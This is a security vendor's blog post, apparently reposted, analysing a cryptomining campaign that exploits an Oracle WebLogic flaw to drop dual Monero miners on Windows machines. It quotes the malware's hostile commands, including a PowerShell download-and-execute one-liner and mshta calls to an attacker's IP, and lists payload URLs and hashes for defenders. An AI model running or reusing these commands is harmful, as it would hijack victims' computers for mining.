Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads

by Johnlery Triunfante and Mark Vicente

The sudden rise of cryptocurrency triggered a shift in the target landscape. Cybercriminals started adapting and using their resources to try acquiring cryptocurrencies, whether through pursuing repositories like Bitcoin wallets or by compromising networks and devices to mine the currency. This isn’t completely new — ransomware authors have been using bitcoin as their preferred currency for years. But more recently, we saw examples of cryptocurrency miners in late October of 2017 when coin miner mobile malware appeared on popular app stores, and in December 2017 when the Digmine cryptocurrency miner was spreading through social media messaging apps.

Now, CVE-2017-10271, a patched Oracle WebLogic WLS-WSAT vulnerability that allows for remote code execution, is being abused to deliver two different cryptocurrency miners: a 64-bit variant and a 32-bit variant of an XMRig Monero miner. If one version is not compatible with the Windows computer that is infected, then the other will run. Figure 1 shows that the code for the exploit is still being developed. This report analyzes the latest version.

Figure 1. Comparison of the code’s older version (right side) and newer version (left side) with a new component (boxed in red)

Figure 1. Comparison of the code’s older version (right side) and newer version (left side) with a new component (boxed in red)

Exploit drops dual miner payloads

At the time of writing, we saw that CVE-2017-10271 was being exploited and delivering a weighty payload detected by Trend Micro as Coinminer_MALXMR.JL-PS. When executed successfully, it can leave the infected machine with dual Monero miners.

Figure 2. How the payload of the exploit may look like (executes Coinminer_MALXMR.JL-PS)

Figure 2. How the payload of the exploit may look like (executes Coinminer_MALXMR.JL-PS)

Once Coinminer_MALXMR.JL-PS is executed, it will download three files to the machine: its mining component javaupd.exe (detected as Coinminer_TOOLXMR.JL-WIN64), its auto-start component startup.cmd (detected as Coinminer_MALXMR.JL-BAT), and also another malicious file 3.exe (detected as Coinminer_MALXMR.JLT-WIN32).

Our analysis of the latest payload shows that the architecture of Windows OS plays a part in deciding which coin miner will run. The first Monero miner is a 64-bit variant which will execute on a corresponding 64-bit Windows device. But, if the device is running a 32-bit Windows version then the second coin miner will run instead.

More devices compromised with multiple miner versions

The process begins with the installation of an auto start component on the machine. At the time of writing, the malware does this by copying startup.cmd to the Startup folder. The .cmd file opens on system startup then executes mshta hxxp://107.181.174.248/web/p.hta next, which then executes a Powershell command:

cmd /c powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString(‘hxxp://107.181.174.248/web/check.ps1’))

The malware creates two different scheduled tasks:

  1. The first task tries to download the coin miner and execute it again and again. Mshta hxxp://107.181.174.248/web/p.hta runs and is scheduled with the name “Oracle Java update.” It executes every 80 minutes, and its process is the same as the startup.cmd file.
  2. The other scheduled task is named “Oracle Java.” It executes daily and terminates the first mining component. It proceeds with the following commands:
  • “cmd /c taskkill /im powershell.exe /f”
  • “cmd /c taskkill /im javaupd.exe /f”
  • “cmd /c taskkill /im msta.exe /f” (We suspect that this is a mistake on the developer’s part and should be mshta.exe.)

After creating these scheduled tasks, Coinminer_MALXMR.JL-PS will then execute its coin mining component javaupd.exe, which allows the mining process to start. It uses the following command:

cmd.exe /c C:\ProgramData\javaupd.exe -o eu.minerpool.pw:65333 -u {Computer Name}

The mining can slow down the system and affect performance.

The second payload, which is the downloaded 3.exe file, will check if the system is running a 32-bit or 64-bit platform. Based on the operating system architecture, it will download and execute a new file LogonUI.exe (detected as COINMINER_MALXMR.JL-WIN32). If the first 64-bit coin miner component is not running, LogonUI.exe will download a .DLL file (detected as COINMINER_MALXMR.FD-WIN32) which will then download and execute the second coin mining component sqlservr.exe (detected as COINMINER_TOOLXMR.JL-WIN32).

This second component is compatible with a 32-bit Windows platform and will run instead of the first. It is also capable of auto-starting and creates a scheduled task that enables it to automatically execute daily:

  1. LogonUI is registered as a service
  2. The service is named “Microsoft Telemetry”
  3. Creates scheduled tasks that will execute “Microsoft Telemetry” daily

Figure 3. The payload execution chain of the coin miner

Figure 3. The payload execution chain of the coin miner

A coin-mining malware tries to infect as many devices as possible since it takes an extraordinary amount of computing power to substantially mine any cryptocurrency. With two payload systems, both of which are capable of starting automatically and daily, the malware developers of this particular exploit have more chances to infect machines and use them for cryptomining.

This particular miner also aims to make the most of the machine it has infected by shutting down other malware. It actually terminates spoosvc.exe and deletes the scheduled task “Spooler SubSystem Service,” which is a known behavior of another cryptocurrency miner detected as TROJ_DLOADR.AUSUHI.

Impact on user and possible countermeasures

This malware uses the system’s central processing unit (CPU) and/or the machine’s graphical processing unit (GPU) resources, making the system run abnormally slow. The user may not attribute the issue to a compromise at first since the effects can be caused by other factors. But, as we mentioned, cryptocurrency miners have been on the rise since mid-2017, and users should expect more malware variants that aim to hijack their system resources. Cybercriminals are taking every opportunity and experimenting with new ways to deliver mining malware to users.

Regularly patching and updating software can mitigate the impact of cryptocurrency malware and other threats that exploit system vulnerabilities (the vulnerability discussed above was patched October 2017). IT/system administrators and information security professionals can also consider application whitelisting or similar security mechanisms that prevent suspicious executables from running or installing. Proactively monitoring network traffic helps better identify red flags that may indicate malware infection. Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security protect end users and businesses from threats by detecting and blocking malicious files and all related URLs. Trend Micro™ Smart Protection Suites deliver several capabilities — such as high-fidelity machine learning, web reputation services, behavior monitoring, and application control — that minimize the impact of this cryptocurrency miner and other threats.
In addition, Trend Micro™ Deep Discovery Inspector™ protects customers via these DDI rules:

  • DDI Rule ID 3874:CVE-2017-10271 – Oracle Weblogic Exploit – http (Request)

Indicators of Compromise

SHA256 Detection name
28e9f5d3768cdccbd886b37964f17754c8b1875c588ced775849a0874e8c2375 Coinminer_MALXMR.FD-WIN64
4b2f0e3165090121e4029908d552a8c559e1b3ee0bb3e679830b5bf91f0ab796 Coinminer_MALXMR.JLT-WIN32
55221771041707c190ddfe322301876a432eb4a5d23888bf150864bcd1c7e709 Coinminer_MALXMR.FD-WIN32
7ecee91336977c324d5b74e3900de36a356702acc526f3b684d599f931bde47b Coinminer_MALXMR.JL-BAT
8a01dc99ac4e197c9c238ad33c3259c1ee124e5f8b5514766af45f29cf299653 Coinminer_MALXMR.JT-PS
9d08c4c50c8fc0efab2ca749b86292077f51f4a157e6ac02ecacf282c5da28eb Coinminer_TOOLXMR.JL-WIN32
bab77860c4d7ccbdfc4f546ea348f68ae05c6e18c5a8f88460d09712138f5b88 Coinminer_MALXMR.JL-PS
d3f0b7b903d7879d0ef1c39c423d2a04dfd61f407dc1844446d7395e033c75ab Coinminer_MALXMR.JL-WIN64
d7cf45c50a201199d5e1c3fca8338ad369ef1e8db9efcb8004210d4f06217e25 Coinminer_TOOLXMR.JL-WIN64
dc71b4e84d39407892e700bda587abf1c921563aaa3fddd074225f5a1068f8bc Coinminer_MALXMR.JL-PS
e390c72b226c7a6d7443074a9ccd54cf4ccf8acd68eea20da8f8a1dfd57a652d Coinminer_MALXMR.JL-WIN32
f05721fc5a4686fef1ea1a82a9065f530ce96aaa693bd00088b67d89606de9c4 Coinminer_TOOLXMR.JL-WIN64
URLs Purpose
hxxp://107.181.174.248/web/2.ps1 Payload used in the exploit
hxxp://107.181.174.248/web/javaupd.exe Used to download files
hxxp://107.181.174.248/web/startup.cmd Used to download files
hxxp://107.181.174.248/z.exe Used to download files
hxxp://107.181.174.248/panelnew/BotLoaderx32.exe Used to download files
hxxp://107.181.174.248/panelnew/BotLoaderx64.exe Used to download files
hxxp://107.181.174.248/panelnew/MainModulex32.dll Used to download files
hxxp://107.181.174.248/panelnew/MainModulex64.dll Used to download files
hxxp://107.181.174.248/123/2.exe Used to download files
hxxp://107.181.174.248/web/p.hta Used for autostart
hxxp://107.181.174.248/web/kil.hta Used for autostart
hxxp://107.181.174.248/web/p.hta Used for autostart
hxxp://107.181.174.248/web/check.ps1 Used for autostart
hxxp://107.181.174.248/web/p.hta Used for autostart
hxxp://zxcvb.pw/api/bot/getSettings.php Used to get configuration
hxxp://107.181.174.248/panelnew/BotLoaderx32.exe Links in getSettings.php
hxxp://107.181.174.248/panelnew/BotLoaderx64.exe Links in getSettings.php
hxxp://107.181.174.248/panelnew/MainModulex32.dll Links in getSettings.php
hxxp://107.181.174.248/panelnew/MainModulex64.dll Links in getSettings.php

 

Post from: Trendlabs Security Intelligence Blog – by Trend Micro

Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads

Read more: Oracle Server Vulnerability Exploited to Deliver Double Monero Miner Payloads

Incoming search terms

Story added 26. February 2018, content source with full text you can find at link above.